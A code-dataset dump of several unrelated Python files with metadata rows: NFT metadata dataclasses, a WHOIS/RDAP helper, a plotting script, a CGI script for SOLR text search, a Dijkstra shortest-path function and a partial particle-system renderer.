| 32.851449 | 159 | 0.598654 | 991 | 9,067 | 5.399596 | 0.275479 | 0.020931 | 0.00841 | 0.013455 | 0.224444 | 0.173239 | 0.164642 | 0.130817 | 0.114745 | 0.114745 | 0 | 0.002089 | 0.313555 | 9,067 | 275 | 160 | 32.970909 | 0.857648 | 0.251792 | 0 | 0.255319 | 0 | 0.014184 | 0.116513 | 0.015233 | 0 | 0 | 0 | 0 | 0 | 1 | 0.141844 | false | 0.028369 | 0.085106 | 0 | 0.35461 | 0.078014 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f66373f676f7fc2f78b1b39bfeacfa7e3aaf7994 | 3,574 | py | Python | thirdweb/types/nft.py | nftlabs/nftlabs-sdk-python | ea533142dc0881872b347cd8ce635dc0bfff3153 | [
"Apache-2.0"
] | 30 | 2021-10-31T13:17:58.000Z | 2022-02-04T13:41:13.000Z | thirdweb/types/nft.py | nftlabs/nftlabs-sdk-python | ea533142dc0881872b347cd8ce635dc0bfff3153 | [
"Apache-2.0"
] | 36 | 2021-11-03T20:30:38.000Z | 2022-02-14T10:15:40.000Z | thirdweb/types/nft.py | nftlabs/nftlabs-sdk-python | ea533142dc0881872b347cd8ce635dc0bfff3153 | [
"Apache-2.0"
] | 10 | 2021-11-10T19:59:41.000Z | 2022-01-21T21:26:55.000Z | from dataclasses import dataclass
from typing import Any, Dict, Optional, Union
@dataclass
class NFTMetadataInput:
"""
The metadata of an NFT to mint
You can use the NFTMetadataInput.from_json(json) method to create
an instance of this class from a dictionary.
:param name: The name of the NFT
:param description: The optional description of the NFT
:param image: The optional image of the NFT
:param external_url: The optional external URL of the NFT
:param animation_url: The optional animation URL of the NFT
:param background_color: The optional background color of the NFT
:param properties: The optional properties of the NFT
"""
name: str
description: Optional[str] = None
image: Optional[str] = None
external_url: Optional[str] = None
animation_url: Optional[str] = None
background_color: Optional[str] = None
properties: Optional[Dict[str, Any]] = None
attributes: Optional[Dict[str, Any]] = None
@staticmethod
def from_json(json: Dict[str, Any]) -> "NFTMetadataInput":
return NFTMetadataInput(
json["name"],
json.get("description"),
json.get("image"),
json.get("external_url"),
json.get("animation_url"),
json.get("background_color"),
json.get("properties"),
json.get("attributes"),
)
def to_json(self) -> Dict[str, Any]:
json: Dict[str, Any] = {}
json["name"] = self.name
if self.description is not None:
json["description"] = self.description
if self.image is not None:
json["image"] = self.image
if self.external_url is not None:
json["external_url"] = self.external_url
if self.animation_url is not None:
json["animation_url"] = self.animation_url
if self.background_color is not None:
json["background_color"] = self.background_color
if self.properties is not None:
json["properties"] = self.properties
if self.attributes is not None:
json["attributes"] = self.attributes
return json
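# Illustrative round trip (follows from the fields above):
#   meta = NFTMetadataInput.from_json({"name": "Token #1", "description": "demo"})
#   meta.to_json() == {"name": "Token #1", "description": "demo"}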
@dataclass
class NFTMetadata:
id: int
uri: str
name: str
description: Optional[str] = None
image: Optional[str] = None
external_url: Optional[str] = None
animation_url: Optional[str] = None
background_color: Optional[str] = None
properties: Optional[Dict[Any, Any]] = None
attributes: Optional[Dict[str, Any]] = None
@staticmethod
def from_json(json: Dict[str, Any]) -> "NFTMetadata":
return NFTMetadata(
json["id"],
json["uri"],
json["name"],
json.get("description"),
json.get("image"),
json.get("external_url"),
json.get("animation_url"),
json.get("background_color"),
json.get("properties"),
json.get("attributes"),
)
@dataclass
class NFTMetadataOwner:
metadata: NFTMetadata
owner: str
@dataclass
class EditionMetadata:
metadata: NFTMetadata
supply: int
@dataclass
class EditionMetadataInput:
"""
The metadata of an edition NFT to mint
:param metadata: The metadata of the edition NFT
:param supply: The supply of the edition NFT
"""
metadata: Union[NFTMetadataInput, str]
supply: int
@dataclass
class EditionMetadataOwner(EditionMetadata):
owner: str
quantity_owned: int
@dataclass
class QueryAllParams:
start: int = 0
count: int = 100
| 27.705426 | 69 | 0.628707 | 421 | 3,574 | 5.268409 | 0.159145 | 0.044184 | 0.067628 | 0.041028 | 0.359333 | 0.329125 | 0.329125 | 0.329125 | 0.329125 | 0.329125 | 0 | 0.001541 | 0.273643 | 3,574 | 128 | 70 | 27.921875 | 0.852851 | 0.181309 | 0 | 0.511364 | 0 | 0 | 0.096457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034091 | false | 0 | 0.022727 | 0.022727 | 0.488636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f664121a0591f3c49d3c27c79769fde8a288b705 | 4,530 | py | Python | fn_whois_rdap/fn_whois_rdap/util/helper.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | fn_whois_rdap/fn_whois_rdap/util/helper.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | fn_whois_rdap/fn_whois_rdap/util/helper.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# (c) Copyright IBM Corp. 2019. All Rights Reserved.
# pragma pylint: disable=unused-argument, no-self-use
import socket
from past.builtins import basestring, unicode
import tldextract
import logging
import time
import traceback
from ipwhois import IPWhois, exceptions
from datetime import date
from urllib import request
def time_str():
today = date.fromtimestamp(time.time())
timestamp = time.strftime('%H:%M:%S')
timenow = "{1} on {0}".format(today, timestamp)
return timenow
def check_input_ip(query):
"""This function checks if the input is an IP, URL or DNS
Arguments:
query {string} -- Artifact.value
Returns:
{bool, str} -- True or False, registered domain
"""
input_is_ip = True
ext = tldextract.extract(query)
if ext.registered_domain:
input_is_ip = False
return input_is_ip, ext.registered_domain
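# Illustrative: check_input_ip("8.8.8.8") -> (True, "")
#               check_input_ip("www.example.com") -> (False, "example.com")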
def check_registered_domain(registered_domain):
    real_domain = False
    try:
        # getaddrinfo raises socket.gaierror if the domain does not resolve
        socket.getaddrinfo(registered_domain, None)[-1][4][0]
        real_domain = True
        return real_domain
    except socket.gaierror:
        logging.error(traceback.format_exc())
        return real_domain
# Gather registry information
def get_whois_registry_info(ip_input, proxies=None):
"""Gather registry information
Arguments:
ip_input {string} -- Artifact.value
Returns:
{object} -- Contains all registry information
"""
try:
proxy_opener = make_proxy_opener(proxies) if proxies else None
internet_protocol_address_object = IPWhois(ip_input, allow_permutations=True, proxy_opener=proxy_opener)
try:
whois_response = internet_protocol_address_object.lookup_whois()
if internet_protocol_address_object.dns_zone:
whois_response["dns_zone"] = internet_protocol_address_object.dns_zone
return whois_response
except exceptions.ASNRegistryError as e:
logging.error(traceback.format_exc())
except:
logging.error(traceback.format_exc())
def get_rdap_registry_info(ip_input, rdap_depth, proxies=None):
"""Gathers registry info in RDAP protocol
Arguments:
ip_input {string} -- Artifact.value
rdap_depth {int} -- 0,1 or 2
Returns:
{object} -- Registry info, RDAP Protocol
"""
try:
proxy_opener = make_proxy_opener(proxies) if proxies else None
internet_protocol_address_object = IPWhois(ip_input, allow_permutations=True, proxy_opener=proxy_opener)
try:
rdap_response = internet_protocol_address_object.lookup_rdap(rdap_depth)
if internet_protocol_address_object.dns_zone:
rdap_response["dns_zone"] = internet_protocol_address_object.dns_zone
return rdap_response
except exceptions.ASNRegistryError as e:
logging.error(traceback.format_exc())
except:
logging.error(traceback.format_exc())
def make_proxy_opener(proxies):
handler = request.ProxyHandler(proxies)
return request.build_opener(handler)
def check_response(response, payload_object):
if response:
response["display_content"] = dict_to_json_str(response)
results = payload_object.done(True, response)
else:
results = payload_object.done(False, response)
return results
def dict_to_json_str(d):
"""Function that converts a dictionary into a JSON string.
Supports types: basestring, bool, int and nested dicts.
Does not support lists.
If the value is None, it sets it to False."""
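    # Illustrative: dict_to_json_str({"a": 1, "ok": None}) -> '{ "a":1,"ok":false }'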
json_entry = u'"{0}":{1}'
json_entry_str = u'"{0}":"{1}"'
entries = []
for entry in d:
key = entry
value = d[entry]
if value is None:
value = False
if isinstance(value, list):
pass
if isinstance(value, basestring):
value = value.replace(u'"', u'\\"')
entries.append(json_entry_str.format(unicode(key), unicode(value)))
elif isinstance(value, unicode):
entries.append(json_entry.format(unicode(key), unicode(value)))
elif isinstance(value, bool):
value = 'true' if value else 'false'
entries.append(json_entry.format(key, value))
elif isinstance(value, int):
entries.append(json_entry.format(unicode(key), value))
elif isinstance(value, dict):
entries.append(json_entry.format(key, dict_to_json_str(value)))
return u'{0} {1} {2}'.format(u'{', ','.join(entries), u'}')
| 31.901408 | 112 | 0.678587 | 567 | 4,530 | 5.216931 | 0.275132 | 0.033469 | 0.062204 | 0.078431 | 0.405003 | 0.361731 | 0.288032 | 0.242055 | 0.210277 | 0.210277 | 0 | 0.00569 | 0.224062 | 4,530 | 141 | 113 | 32.12766 | 0.835846 | 0.179912 | 0 | 0.247191 | 0 | 0 | 0.0266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089888 | false | 0.011236 | 0.101124 | 0 | 0.292135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f66596fd7558631f8b9f361150e7e02c8bbae04c | 2,086 | py | Python | unity-environment/Learning/plot_with_std.py | KooroshNaderi/UnityClimberAgent | 1953dc6786872304a2fd19140f685895557ad052 | [
"Apache-2.0"
] | null | null | null | unity-environment/Learning/plot_with_std.py | KooroshNaderi/UnityClimberAgent | 1953dc6786872304a2fd19140f685895557ad052 | [
"Apache-2.0"
] | 6 | 2019-12-23T21:43:11.000Z | 2022-02-10T00:40:39.000Z | unity-environment/Learning/plot_with_std.py | KooroshNaderi/UnityClimberAgent | 1953dc6786872304a2fd19140f685895557ad052 | [
"Apache-2.0"
] | null | null | null | '''
Created on Oct 4, 2017
@author: amin
'''
from __future__ import division, print_function
from matplotlib import pyplot as plt
import numpy as np
import matplotlib
import os
# Set some parameters to apply to all plots. These can be overridden
# in each plot if desired
# Plot size to 14" x 7"
matplotlib.rc('figure', figsize=(14, 7))
# Font size to 14
matplotlib.rc('font', size=14)
# Do not display top and right frame lines
matplotlib.rc('axes.spines', top=False, right=False)
# Remove grid lines
matplotlib.rc('axes', grid=False)
# Set background color to white
matplotlib.rc('axes', facecolor='white')
dir_list = [
'baseline_no_learning',
]
dir_size = 10
plot_whole_data = False
legends = []
for d in range(len(dir_list)):
data = None
for root, dirs, file_names in os.walk(os.path.join('results', dir_list[d])):
for f in range(dir_size):
new_data = np.genfromtxt(os.path.join(root, file_names[f]))
if data is None:
data = np.zeros((new_data.shape[0], dir_size))
data[:, f] = new_data
mean = np.mean(data, axis=1)
std = np.std(data, axis=1)
if plot_whole_data:
p = plt.plot(list(range(data.shape[0])), mean)
plt.fill_between(list(range(data.shape[0])), mean - std / 2, mean + std / 2, color=p[0].get_color(), alpha=0.3)
else:
step = 1000
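        # Block-average mean/std over non-overlapping windows of `step` frames
        # to smooth the plotted curves.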
idx = np.arange(0, data.shape[0], step)
mean_smooth = np.zeros(len(idx))
std_smooth = np.zeros(len(idx))
for i in range(len(idx)):
mean_smooth[i] = np.mean(mean[i * step: (i + 1) * step])
std_smooth[i] = np.mean(std[i * step: (i + 1) * step])
p = plt.plot(idx, mean_smooth)
# plt.fill_between(idx, mean_smooth-std_smooth/2, mean_smooth+std_smooth/2, color=p[0].get_color(), alpha=0.3)
legends.append(dir_list[d][dir_list[d].rfind('/') + 1:])
plt.legend(legends)
plt.title('State cost + control cost in 10 minutes of simulation (bipedal walking task)')
plt.xlabel('Frame index')
plt.ylabel('State Cost + Control Cost')
# plt.yscale('log')
plt.show()
| 33.111111 | 119 | 0.645733 | 338 | 2,086 | 3.87574 | 0.37574 | 0.045802 | 0.030534 | 0.032061 | 0.145802 | 0.070229 | 0.035115 | 0.035115 | 0.035115 | 0 | 0 | 0.026029 | 0.208054 | 2,086 | 62 | 120 | 33.645161 | 0.766949 | 0.183605 | 0 | 0 | 0 | 0 | 0.103142 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.113636 | 0 | 0.113636 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f666a22d035d3d4a25437e0747c3477add75b192 | 3,373 | py | Python | docker/laaws-demo-webui/cgi-bin/text-search.py | lockss/laaws-demo | f7aeb1b3a15f5955ae7ab41b64b5e45d07e0433e | [
"BSD-3-Clause"
] | null | null | null | docker/laaws-demo-webui/cgi-bin/text-search.py | lockss/laaws-demo | f7aeb1b3a15f5955ae7ab41b64b5e45d07e0433e | [
"BSD-3-Clause"
] | null | null | null | docker/laaws-demo-webui/cgi-bin/text-search.py | lockss/laaws-demo | f7aeb1b3a15f5955ae7ab41b64b5e45d07e0433e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
import requests
import json
import cgi
import cgitb
import sys
cgitb.enable(display=0, logdir="/usr/local/apache2/logs/cgitb")
# URL prefix for SOLR query service
# XXX should work with both EDINA and BL
service = "http://laaws-indexer-solr:8983/solr/test-core/select"
# URL prefix for OpenWayback
wayback = "http://demo.laaws.lockss.org:8080/wayback/*"
message = 'Content-Type:text/html' + '\n\n' + '<h1>Text Search</h1>\n'
redirectTo = None
urlArray = []
# return a Dictionary with the query params
def queryParams(s):
if 'Search' in s:
ret = {}
ret['q'] = s["Search"].value
ret['indent'] = "on"
ret['wt'] = "json"
else:
ret = None
return ret
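# Illustrative: a form submission with Search="lockss" yields
# {'q': 'lockss', 'indent': 'on', 'wt': 'json'}; no Search field yields None.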
try:
if(len(sys.argv) > 1):
# Run from command line
params = {}
params['q'] = sys.argv[1]
params['indent'] = "on"
params['wt'] = "json"
else:
# get data from web page form
input_data=cgi.FieldStorage()
# convert to SOLR query params
params = queryParams(input_data)
if params != None:
message = message + "SOLR search for {}<br />\n<br />\n".format(params['q'])
# query the service
solrResponse = requests.get(service, params=params)
status = solrResponse.status_code
if(status == 200):
# parse the JSON we got back
solrData = solrResponse.json()
# XXX response is paginated
if "response" in solrData and "docs" in solrData["response"]:
docs = solrData["response"]["docs"]
if(len(docs) < 1 or docs[0] == None):
message = message + "docs is empty"
else:
for doc in docs:
url = None
if "response_url" in doc:
url = doc["response_url"][0]
elif "url" in doc:
url = doc["url"]
if url != None:
urlArray.append(url)
else:
message = message + "No docs found\n"
else:
# SOLR search query unsuccessful
message = message + "SOLR service response: {}\n".format(status)
else:
# No search data from form
message = message + "No search string from form\n"
if(len(urlArray) == 1):
message = "Location: {}".format(urlArray[0]) + '\n'
elif len(urlArray) > 1:
# multiple urls, create page of links
message = message + '<ol>\n'
        # Sorting is needed to ensure consistent output order for testing
for url in sorted(urlArray):
message = message + '<li><a href="{0}/{1}">'.format(wayback,url) + "{}</a></li>\n".format(url)
message = message + "</ol>\n"
else:
message = message + "<br />\nError: No URLs returned\n"
except requests.exceptions.ConnectTimeout:
    message = message + 'Timeout connecting to SOLR search service {}\n'.format(service)
except requests.exceptions.ConnectionError:
    message = message + 'Cannot connect to SOLR search service {}\n'.format(service)
except:
e = sys.exc_info()
try:
message = message + cgitb.text(e)
except AttributeError:
message = message + "Got AttributeError: {}\n".format(e[0])
print(message)
| 35.505263 | 106 | 0.558257 | 401 | 3,373 | 4.680798 | 0.36409 | 0.096963 | 0.012786 | 0.011721 | 0.05967 | 0.044752 | 0.044752 | 0.044752 | 0 | 0 | 0 | 0.011693 | 0.315446 | 3,373 | 94 | 107 | 35.882979 | 0.801213 | 0.137563 | 0 | 0.121622 | 0 | 0 | 0.209744 | 0.017623 | 0.013514 | 0 | 0 | 0 | 0 | 1 | 0.013514 | false | 0 | 0.067568 | 0 | 0.094595 | 0.013514 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f66747f467bda95dc0b3cabad44bd181726ed982 | 4,682 | py | Python | src/Dijkstra.py | CATHY0706/Dijkstra_tsp | efbfe88410d2dfa8b5f25f0b85e9309d283dbfeb | [
"Apache-2.0"
] | null | null | null | src/Dijkstra.py | CATHY0706/Dijkstra_tsp | efbfe88410d2dfa8b5f25f0b85e9309d283dbfeb | [
"Apache-2.0"
] | null | null | null | src/Dijkstra.py | CATHY0706/Dijkstra_tsp | efbfe88410d2dfa8b5f25f0b85e9309d283dbfeb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: Tianyi Zhang and Botao Gao
Created on Tue Dec 1st 14:03:37 2020
Based on the code found in tutorial at this website: 'https://blog.csdn.net/u014798883/article/details/106200697'
"""
def dijkstra(adjacency_matrix, start, path, cost, max):
"""
Solve the shortest path problem with Dijkstra's algorithm.
:param adjacency_matrix: A two-dimensional array (an adjacency matrix), which used to represent indicate whether pairs
of vertices are adjacent or not in the graph.
:param start: starting node, input by user, int type
    :param path: predecessor array; path[i] is the previous node on the shortest path from V0 to Vi.
    :param cost: the shortest known path length from V0 to Vi
    :param max: int type, a sentinel value treated as infinity, usually 10000
    mid_node: transit point; the unvisited node with the shortest known path from V0 is chosen as the transit point.
    next_node: centered on the transit point, try to optimize the path: check whether reaching next_node
        directly from V0 or via mid_node is cheaper.
    check_node: index used to search the cost array for the closest unvisited node, which is then assigned
        to mid_node as the transit point.
    :return path: the predecessor array encoding the shortest paths
"""
# get the size of the adjacency matrix
length = len(adjacency_matrix)
# Initialize the p array to 0, to mark whether the point has been added to the shortest path
p = [0] * length
# Initialize path,cost,p
for i in range(length):
if i == start:
# set the start node as 1
p[start] = 1
else:
# cost[i]: Get the cost of reaching other points directly from the starting point
cost[i] = adjacency_matrix[start][i]
# if cannot reach the starting point directly, set as -1
path[i] = (start if (cost[i] < max) else -1)
# print p, cost, path
# Traverse all points (excluding the starting point)
for i in range(1, length):
# Maximum initial value
min_cost = max
mid_node = -1
# Search for a point closest to the starting point v0 as a transit point mid_node
for check_node in range(length):
if p[check_node] == 0 and cost[check_node] < min_cost:
# If it is found that the cost of passing a transit point is less than the minimum cost
# then update the min_cost and check_node
min_cost = cost[check_node]
mid_node = check_node
# If the path with a cost less than the minimum cost cannot be found, jump out of the loop
if mid_node == -1:
break
# If the path with a cost less than the minimum cost has been found, add the check_node to the shortest path
p[mid_node] = 1
# for loop: Update the cost and path of other nodes
for next_node in range(length):
# Check all points next_node which are not traversed
# Check the influence of mid_node (which has been added to the path in the previous step) on next_node
# If the total cost is less than the existing minimum cost, update the path and cost array
if p[next_node] == 0 and (adjacency_matrix[mid_node][next_node] + cost[mid_node] < cost[next_node]):
# update cost
cost[next_node] = adjacency_matrix[mid_node][next_node] + cost[mid_node]
# update path
path[next_node] = mid_node
# return the shortest path
return path
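# Recovering an explicit route (illustrative, assuming t is reachable): `path`
# holds predecessors, so walk backwards from a destination t and reverse:
#   route = [t]
#   while route[-1] != start:
#       route.append(path[route[-1]])
#   route.reverse()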
if __name__ == '__main__':
maximum = 10000
G = [
# this is the area for you to enter your adjacency matrix
[0, 294, 1076, 1021, 10000, 10000, 10000, 10000],
[294, 0, 794, 906, 896, 10000, 10000, 10000],
[1076, 794, 0, 1106, 740, 743, 10000, 10000],
[1021, 906, 1106, 0, 536, 10000, 1362, 10000],
[10000, 896, 740, 536, 0, 1141, 985, 1566],
[10000, 10000, 743, 10000, 1141, 0, 1582, 894],
[10000, 10000, 10000, 1362, 985, 1582, 0, 1342],
[10000, 10000, 10000, 10000, 1566, 894, 1342, 0]
# this is the area for you to enter your adjacency matrix
]
# enter your starting node here
start_node = 0
path = [0] * len(G)
cost = [0] * len(G)
print('The shortest path:', dijkstra(G, start_node, path, cost, maximum))
print('The cost to each node:', cost)
| 44.590476 | 124 | 0.602307 | 676 | 4,682 | 4.093195 | 0.279586 | 0.035417 | 0.043368 | 0.019516 | 0.122515 | 0.091073 | 0.091073 | 0.091073 | 0.091073 | 0.061438 | 0 | 0.093898 | 0.324434 | 4,682 | 104 | 125 | 45.019231 | 0.780904 | 0.519436 | 0 | 0 | 0 | 0 | 0.023426 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0 | 0 | 0.04878 | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f6715c20809e2e51e6fcf8fa73b5bb43564256b6 | 29,278 | py | Python | game/particle/p4system.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | [
"MIT"
] | 5 | 2021-06-25T16:44:38.000Z | 2021-12-31T01:29:00.000Z | game/particle/p4system.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | [
"MIT"
] | null | null | null | game/particle/p4system.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | [
"MIT"
] | 1 | 2021-06-25T20:33:47.000Z | 2021-06-25T20:33:47.000Z | import moderngl
from .p4dyna.equation import Equation
from numpy.random import random
class ParticleSystem:
def __init__(self, game, brender, fname, target, miss, move_data):
self.game = game
self.brender = brender # meh
self.N = 500000
self.particles = 0
self.fname = fname
self.target = target
self.miss = miss
self.move_data = move_data
# TODO: convert to proper change
self.basis = (-1.0, 1.0, 1.0) if self.target[0] == 0 else (1.0, 1.0, 1.0)
print("Target:", self.target, self.basis)
# TODO: temp
self.time_alive = -0.8
self.step_count = self.time_alive
self.warp = 1
self.step_warp = 1
self.step_size = self.game.m_par.step_size * self.step_warp
self.emitters = []
self.renderers = []
self.miscs = []
self.equations = {}
self.transformer = None
self.load_context_objects()
self.spawn_elements()
def on_tick(self, time, frame_time):
if (not self.particles) and self.time_alive > 1:
return False
for eq in self.equations.values():
eq.reset_eval()
frame_time *= self.warp * (3 if self.game.m_par.fast_forward else 1)
self.step_size = self.game.m_par.step_size * self.step_warp
self.time_alive += frame_time
time = self.time_alive
self.step_count += frame_time
steps = 0
if self.step_count > self.step_size:
# # Matrix
# self.warp = max(0.1, self.warp * 0.995)
# self.step_warp = self.warp
steps = int(self.step_count // self.step_size)
self.step_count = self.step_count % self.step_size
for _ in range(steps):
self.transformer.render(time, self.step_size)
for emitter in self.emitters:
emitter.render(time, self.step_size)
self.switch_buffers()
for misc in self.miscs:
misc.render(time)
self.render(time, frame_time)
# print(time)
# if steps:
# self.switch_buffers()
return True
def render(self, time, frame_time):
# Solid
self.game.m_par.set_render(1)
for renderer in (x for x in self.renderers if x.equation == 1):
renderer.render(time, frame_time)
# Alpha
self.game.m_par.set_render(2)
for renderer in (x for x in self.renderers if x.equation == 2):
renderer.render(time, frame_time)
# Anti
self.game.m_par.set_render(4)
for renderer in (x for x in self.renderers if x.equation == 3):
renderer.render(time, frame_time)
self.game.m_par.set_render(3)
def r(self, owner, name, parse=True, throw=True):
name = f"field_{name}"
if name in owner.params:
v = owner.params[name]
if parse and "!" in str(v):
return self.p(v)
elif "?" in str(v):
return v.replace("?key?", "key")
return v
if throw:
raise UnboundLocalError(f"Entry is missing named: {name}.")
return "0"
def switch_buffers(self):
self.vbo1, self.vbo2 = self.vbo2, self.vbo1
for renderer in self.renderers:
renderer.switch_buffers()
self.transformer.switch_buffers()
err = self.game.ctx.error
if err != "GL_NO_ERROR":
print(err)
def load_context_objects(self):
self.vbo1 = self.game.ctx.buffer(reserve=self.N * self.game.m_par.stride)
self.vbo2 = self.game.ctx.buffer(reserve=self.N * self.game.m_par.stride)
def spawn_elements(self):
js = self.game.m_res.get_particle(self.fname, self.move_data)
self.transformer = Transformer(self.game, self)
stage_dict = {}
for node in js["nodes"]:
if node["title"] == "Stage":
stage = node["content"]["field_stage"]
for output in node["outputs"]:
stage_dict[output["id"]] = stage
filters = set()
for node in js["nodes"]:
if node["title"][:6].lower() == "filter":
for output in node["outputs"]:
filters.add(output["id"])
filters = list(filters)
filter_edge_dict = {}
for edge in js["edges"]:
if edge["start"] in filters:
filter_edge_dict[edge["end"]] = edge["start"]
if edge["end"] in filters:
filter_edge_dict[edge["start"]] = edge["end"]
edge_dict = {}
for edge in js["edges"]:
if edge["start"] in stage_dict.keys():
edge_dict[edge["end"]] = stage_dict[edge["start"]]
if edge["end"] in stage_dict.keys():
edge_dict[edge["start"]] = stage_dict[edge["end"]]
for i, letter in enumerate("xyz"):
self.equations[f"user_{letter}"] = Equation(
self,
f"user_{letter}",
f"self.system.brender.get_loc_fighter({1 if self.target[0] == 0 else 0}, {self.basis})[{i}]",
)
self.equations[f"target_{letter}"] = Equation(
self,
f"target_{letter}",
f"self.system.brender.get_loc_fighter({0 if self.target[0] == 0 else 1}, {self.basis})[{i}]",
)
for node in js["nodes"]:
if node["title"] == "Equation":
# print(node["title"])
self.add_equation(node)
for node in js["nodes"]:
# print(node)
if node["title"] == "Emit":
# print(node["title"])
stage = int(edge_dict[node["inputs"][0]["id"]])
self.emitters.append(Emitter(self.game, self, node, stage))
elif node["title"] == "Trigger":
# print(node["title"])
self.miscs.append(Trigger(self.game, self, node))
elif node["title"] == "Actor":
# print(node["title"])
self.miscs.append(Actor(self.game, self, node))
elif node["title"] == "Camera":
# print(node["title"])
self.miscs.append(Camera(self.game, self, node))
elif node["title"] == "Equation":
pass
elif node["title"] == "Render":
# print(node["title"])
stage = int(edge_dict[node["inputs"][0]["id"]])
self.renderers.append(Renderer(self.game, self, node, stage))
for node in js["nodes"]:
if node["title"].lower()[:3] == "geo":
# print("geo")
# print(node["title"])
id = node["inputs"][0]["id"]
if id in edge_dict:
# print("stagebound")
stage = int(edge_dict[id])
self.transformer.add_geoblock(node, None, stage)
else:
# print("filterbound")
filter = int(filter_edge_dict[id])
self.transformer.add_geoblock(node, filter, None)
for node in js["nodes"]:
if node["title"][:6].lower() == "filter":
# print(node["title"])
# print(node["inputs"])
stage_in = int(
edge_dict[
[x for x in node["inputs"] if x["socket_type"] == 3][0]["id"]
]
)
stage_out = int(
edge_dict[
[x for x in node["inputs"] if x["socket_type"] == 0][0]["id"]
]
)
self.transformer.add_geoblock(node, None, stage_in, stage_out)
self.transformer.load_programs()
self.transformer.load_context_objects()
def add_equation(self, params):
self.params = params["content"] # meh
self.equations[self.r(self, "label")] = Equation(
self,
self.r(self, "label", parse=False),
self.r(self, "equation", parse=False),
)
def p(self, q, parse=True):
if "!" in q:
for key, value in self.equations.items():
if f"!{key}!" in q:
q = q.replace(f"!{key}!", str(value.get(self.time_alive)))
if parse:
return eval(q)
return q
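    # Illustrative: p("!user_x! + 1.0") substitutes the evaluated value of the
    # "user_x" Equation for "!user_x!", then eval()s the resulting expression.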
class Emitter:
def __init__(self, game, system, params, stage):
self.game = game
self.system = system
self.N = self.system.N
self.params = params["content"]
self.title = "Emitter"
self.stage = stage
self.emit_want = 0
self.counters = 0
self.alive = True
self.load_programs()
self.load_context_objects()
self.set_fields()
def set_fields(self):
self.delay = float(self.system.r(self, "delay"))
self.emit_count = float(self.system.r(self, "count"))
self.duration = float(self.system.r(self, "duration"))
self.prog_emit["Stage"] = self.stage
self.prog_emit["Position"] = (
float(self.system.r(self, "pos_x"))
+ float(self.system.r(self, "vel_x")) / 45,
float(self.system.r(self, "pos_y"))
+ float(self.system.r(self, "vel_y")) / 45,
float(self.system.r(self, "pos_z"))
+ float(self.system.r(self, "vel_z")) / 45,
)
self.prog_emit["Position_sway"] = (
float(self.system.r(self, "pos_range_x"))
+ float(self.system.r(self, "vel_x")) / 45,
float(self.system.r(self, "pos_range_y"))
+ float(self.system.r(self, "vel_y")) / 45,
float(self.system.r(self, "pos_range_z"))
+ float(self.system.r(self, "vel_z")) / 45,
)
self.prog_emit["Position_radial"] = False
self.prog_emit["Velocity"] = (
float(self.system.r(self, "vel_x")),
float(self.system.r(self, "vel_y")),
float(self.system.r(self, "vel_z")),
)
self.prog_emit["Velocity_sway"] = (
float(self.system.r(self, "vel_range_x")),
float(self.system.r(self, "vel_range_y")),
float(self.system.r(self, "vel_range_z")),
)
self.prog_emit["Velocity_radial"] = False
self.prog_emit["Size"] = float(self.system.r(self, "size"))
self.prog_emit["Size_sway"] = float(self.system.r(self, "size_range"))
self.prog_emit["Colour"] = (
float(self.system.r(self, "col_r")),
float(self.system.r(self, "col_g")),
float(self.system.r(self, "col_b")),
)
self.prog_emit["Colour_sway"] = (
float(self.system.r(self, "col_range_r")),
float(self.system.r(self, "col_range_g")),
float(self.system.r(self, "col_range_b")),
)
self.prog_emit["Rotation"] = float(self.system.r(self, "rot"))
self.prog_emit["Rotation_sway"] = float(self.system.r(self, "rot_range"))
